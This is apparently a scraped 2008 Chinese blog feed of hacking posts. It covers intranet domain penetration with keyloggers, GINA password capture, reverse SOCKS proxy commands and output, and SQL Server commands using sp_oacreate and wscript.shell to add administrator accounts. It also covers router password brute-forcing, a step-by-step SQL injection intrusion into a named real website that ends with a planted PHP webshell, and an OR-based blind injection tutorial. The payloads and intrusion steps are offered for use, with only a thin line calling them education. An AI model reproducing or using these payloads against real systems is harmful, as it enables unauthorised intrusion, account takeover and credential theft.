我们再来看一下本机在域里面的角色,如图:


看来只是一个普通域用户.我们再来查看一下域里面的用户.如图:


域里面的用户很多,那么我们再查看一下域管理员有哪些:


 

从上面我们掌握了内网的大概信息。下面我们进一步利用这些信息。
二.信息的利用:
1. 首先是内网占据的这台机器,要做几个必要的措施:1)种键盘记录,记录其可能登录的密码,有用的。2)抓hash跑密码,主要查看密码规则是否有规律,它的密码也可以去试下其它机器的密码,看是否通用。3)种gina,这一步主要不是记录当前用户的密码,而是为了来记录域管理员的登录密码,因为域管理员是有权限登录下面每台用户的机器的,gina是可以记到的,记到域管理密码后,内网在域中的机器就可以全部控制了。4)给占据机器上的备用安装文件或是备用驱动上绑马,此是为了防止对方重装机器,马就掉了。
2. 反弹socks代理。
在内网渗透中,反弹socks代理是很必要的,大家都知道用lcx来转发端口,好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其它机器,我们不可能一个一个的去中转端口连接,在当前控制的机器上开代理也没办法,因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明白。
首先在本机监听:
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......
此命令是将连接进来的53端口的数据包连接到1180端口。
 
在对方机器上运行:
 
C:\RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!
上面的x.x.x.x为你的外网ip,下面为你接收到反弹回来的代理显示的情况。
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......
[+] Recv Main Command Echo ok!
[+] Send Main Command Echo ok!
[+] Recv Main Command Echo again ok!
[+] Get a MainSocket on port 53 from x.x.x.x ......
[+] Waiting Client on Socks5 Agent Port:1180....
 
上面ok了,接下来在你本机安装sockscap,照下图设置就ok了。

 


Sockscap设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去试密码或是登录管理,也可以用mssql连接内网的1433,尝试sa弱口令等。总之反弹socks是你利用已控制的内网机器通向内网其它机器的一道桥梁。
 
三.思考:
   信息有了,通道有了,接下来我们怎么做?
1. 内网溢出,通过对内网的扫描情况,判断win2000的机器,利用ms06040进行运程溢出。
2. 内网web,通过内网的扫描,用sockscap上的ie来打开内网开放的web,在内网采用web注入或上传的方式来获取webshell提权。
3. 内网弱口令试探,利用ipc,或是3389,和已掌握的密码信息来尝试猜解内网nt的密码,当然这需要耐心,也是非常有用的。
4. 猜解sql弱口令,在sockscap控制台中用sql连接器连接内网开放1433或是3306的机器,猜解弱口令。
5. 内网嗅探,不得已的办法,不推荐。
6. 内网主动会话劫持,篇幅长,难度高,下次详写。
四.突破:
突破是考验经验和思维的时候,利用已掌握的信息去突破面临的困难。如,如何拿到第一台内网服务器站稳脚;如何拿到内网到外网授权的机器;如何拿到外网密码。
在内网中站稳脚后,迅速判断管理员机器,控制管理员的机器极为重要。一般从机器名可以看出管理员机器,管理员的机器名常为:andy 、admin 、peter、 kater,在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。不是域控的环境中,我们也可以在内网测试服务器中跑出服务器的密码进而拿去尝试管理员的密码。
在突破过程中,内网的数据库和web的分析很重要,数据库里面有很多有用的信息,web的数据库连接及作用也有助于进一步的分析。总之在这一过程中只有灵活运用,发散思维才可以进一步的突破和控制。
 
 
黑客与安全是一个矛盾话题,只有知已知彼才能更好地维护内网安全。以上是黑客常用的内网渗透手法,知识有限,文笔粗拙,高手笑过,此文仅供新手科普。

 

]]> 2008-07-05 10:47:18 <![CDATA[ SQL提权演示 ]]> http://blog.tom.com/xieliang_521/article/5071.html SQL提权演示

  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组

  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组

  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。

 

下面给大家演示一下整个SQL提权的过程:

默认GUEST用户密码为空禁用状态!

 

激活GUEST用户

 

激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!

 

把Guest加到管理组

 

成功把GUEST加到了管理组,成功进入了服务器!

 

进去后能做些什么?相信这个就不用我罗嗦了。

 


 

]]> 2008-07-05 10:39:25 <![CDATA[ 教菜鸟破解路由器的帐号和密码 ]]> http://blog.tom.com/xieliang_521/article/5070.html 对于如何破解网吧路由器的帐号和密码,虽然我在以前的文章里也曾经介绍过一些方法,但是仍然在论坛上会看到许多菜鸟朋友问:路由器的密码应该如何破解?灰鸽子上线如何在路由器上制作端口映射?那么本文我就来总结几个破解路由器密码的方法以及如何实现内网中反弹木马的上线!

一.扫描路由器端口为了路由器的安全,网管通常都会将路由器的默认端口(80)给更改掉,所以我们破解路由器密码的第一步就是必须要找到路由器的wEB管理端口。

如果路由器上的UPnP(通用即插即用,是一组协议的统称)功能是开启的(通常路由器默认情况下UPnP都是开启的),那么路由器一定会开放一个l900端口。

我们以TP—Link路由器为例,只要打开路由器的http://192.168.1.1:l900/igd.xml查看其中的http://192.168.1.1:8080,8080就是当前路由器wEB的登录端口了。

如果UPnP被网管关闭了的话,那么我们就只能通过扫描工具来扫描了。打开X—scan,输入IP地址192.168.1.1

在扫描模块里选择“开放服务”,在“插件设置”的“端口相关设置”里输入端口范围1—65350,确定后,再点击扫描。X—Scan的扫描速度很快,不一会儿就可以扫描出路由器所开放的端口

二.破解路由器密码我介绍一个功能比较强大的路由器破解软件WebCrack4.0打开WebCrack4.0后的界面在“用户名文件”栏选择用户名的字典文件,在“使用用户名字典”栏选择密码字典文件,在URL里输入路由器的wEB管理地址http://192.168.1.1:8080,在用户名里填admin,就是说用户名先从admin 那么只能用暴力破解的方法了,用的到工具:1:WebCrack4  2:superdic.暴力破解当然要用到密码字典了,其实你自己也可以去配置字典,把对方可能用到的密码全写出来,或者用上面的工具2生成一个密码字典,然后开始破解.

如果万一破解不了路由器,就得想其它办法;

用upnp比特精灵看看能映射出去不。
破网吧路由估计可能性不大。除非哪个网管懒得连默认密码都没改
如果能进网络邻居,可以用VPN连接出去
最简单就是找个鸡鸡,开个8080映射一下(找朋友要个鸡鸡不难吧?)
目前好像就这些方法。。。

]]> 2008-07-05 10:34:54 <![CDATA[ 对搜狐网(sohu.com)的一次入侵记录 ]]> http://blog.tom.com/xieliang_521/article/5068.html
  看看sohu.com的主站发现差不多都是静态的,于是放弃了在主站上找问题的想法。直接在sohu.com的各个分站上浏览了一圈后发现,大部分网站采用的都是Php脚本,也有少数用的是jsp脚本,根据经验我们知道,对于Php构建的系统,一般后台数据库都是Mysql,就好象asp对应着Mssql一样,看来可能存在问题的地方还是很多的。由于Php的特性(Php默认将传递的参数中的'等字符做了转换,所以对于字符类型的变量默认情况下很难注入),一般情况下我们注入的只能是数字类型的变量了。根据平时注入的知识,我们知道id=XXX这样的形式传递的参数一般都是数字类型的变量,所以我们只要去测试那些php?id=XXX的连接就可能找到漏洞了!通过一番仔细的搜索,还真让我在XXX.it.sohu.com上找到了一个存在问题的连接http://XXX.it.sohu.com/book/serialize.php?id=86

  提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*

  然后提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*

  空空的吧,应该是SQL语句结果为空了。

  通过这两个Url我们可以猜测漏洞是存在的,因为我们提交的and 1=1和and 1=2都被当作Sql语句执行啦!那么我们提交的其他语句也是可以执行的,这就是Sql注入了!我们还可以知道id这个变量是被当作数字处理的,没有放到''之间,否则我们是成功不了的哦!如果变量没有过滤Sql其他关键字的话,我们就很有可能成功啦!我遇到很多的情况都是变量过滤了select,在mysql里就是死路了,好郁闷!

  既然漏洞是存在的,让我们继续吧!首先当然是探测数据库的类型和连接数据库的帐户啦!权限高并且数据库和web同机器的话可以免除猜测字段的痛苦啦!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*

  这个语句是看数据库的版本是不是高于3的,因为3的ASCII是51嘛!版本的第一个字符是大于51的话当然就是4.0以上啦!4.0以上是支持union查询的,这样就可以免除一位一位猜测的痛苦哦!这里结果为真,所以数据库是4.0以上的哦,可以支持union了。

  既然支持union查询就先把这个语句的字段给暴出来吧!以后再用union查询什么都是很快的哦!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*

  看来字段是大于10个的,继续提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*

  正常返回,提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*

  ......

  到order by 50的时候返回没有信息了!看来是大于40的小于50的,于是提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*

  ......

  终于猜测到字段是41左右啦!这里说是左右是因为有些字段是不能排序的,所以还需要我们用union精确定位字段数字是41,提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

  哈哈,成功了哦!哪些字段会在页面显示也是一目了然了!现在让我们继续吧!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

  完成了数据库系统的探测哦!我们很有可能不是root,并且数据库服务器和web也很有可能不是在一台服务器,这样的话我们就没有file权限了!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*

  没有对mysql的读取权限,更加确定权限不是root了!呵呵!

  既然不是root,也不要气馁,让我们继续吧!在进一步猜测数据之前我们最好找下后台先,很多时候找到了管理员密码却找不到地方登陆,很郁闷的说!在根目录下加/admin和/manage/等等后台常用的地址都是返回404错误,猜测了几次终于在/book/目录下admin的时候出现了403 Forbiden错误,哈哈,是存在这个目录的!但是登陆页面死活也猜不出来,郁闷中!不过既然知道有个admin也好说,去Google里搜索:

  admin site:sohu.com

  得到了另外一个分站的论坛,我们知道人是很懒惰的,通常一个地方的后台的特征就很可能是整个网站的特征,所以当我尝试访问/book/admin/admuser.php的时候奇迹出现了,哈哈,离成功更近了哦!到这里我们知道了网站的后台,其实我们还可以得到很重要的信息,查看原文件发现登陆表单的名字是name和password,很容易推测出对方管理员表中的结构,即使不符合估计也差不多,呵呵!所以知道为什么我们要先猜测后台了吧!继续注入吧!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*

  返回错误,说明不存在admin这个表,尝试admins以及admin_user等等,最后提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

  的时候返回成功,哈哈!有User这个表!那么是不是管理员表呢?字段又是什么呢?继续提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

  返回空信息的错误,提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

  正常返回并且出来了一个密码,应该是管理员表里第一个用户的密码!那么他的用户名字是什么呢?猜测很多字段都是返回错误,实在没有办法的时候输入一个ID,居然返回成功了!ID就是管理员的名字哦!提交:

  http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*

  哈哈,得到管理员的名字了哦!激动地拿着管理员名字和密码去后台登陆成功了哦!现在是想想怎么拿webshell的时候了,在后台发现有上传图片的地方,但是当上传php文件的时候提示说不是图片文件,郁闷了!在后台仔细的乱七八糟的乱翻了会,发现有个生成php文件的功能,于是在里面插入了一句话的php后门,点生成之后提示成功了,看来如果没有过滤的话我们应该是得到webshell了,密码是a,用一句话后门连上去,哈哈,成功了!脚本检测到此圆满完成!

  在得到webshell之后我上服务器上看了看,发现服务器的安全是做得不错,执行不了命令,并且基本上所有的目录除了我们刚才上传的目录之外都是不可写的,不过作为脚本测试,得到了webshell也就算成功了吧!也可以看出,小小的一个参数没有过滤就可以导致网站的沦陷,特别是像sohu.com这样的大站,参数更多,更加要注意过滤方面的问题哦!

]]> 2008-07-04 21:52:44 <![CDATA[ 新or注入教程 ]]> http://blog.tom.com/xieliang_521/article/5067.html
From:绝对零度blog

记得一年前火狐有一位朋友问,如果一个站过滤了and和"'"的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。
我们来构造测试语句:

Copy code
vpro.asp?id=1 or exists(select * from admin)
返回错误页面,说明存在admin表我们来换一个表试试!

Copy code
vpro.asp?id=1 or exists(select * from n0h4ck)
说明不存在n0h4ck这个表。
我们继续来,构造语句
Copy code
vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的页面,说明admin表存在admin字段。

Copy code
vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的页面,说明admin表不存在padd字段。
我们现在开始猜测数据了,
Copy code
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'
返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。
我们再来
Copy code
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'
返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。
我们用left函数确定一下,
Copy code
vpro.asp?id=1 or (select left(admin,5) from admin)='admin'
猜测正确,的确是admin,好了,后面的话就不用我说了吧!
]]> 2008-07-04 21:48:21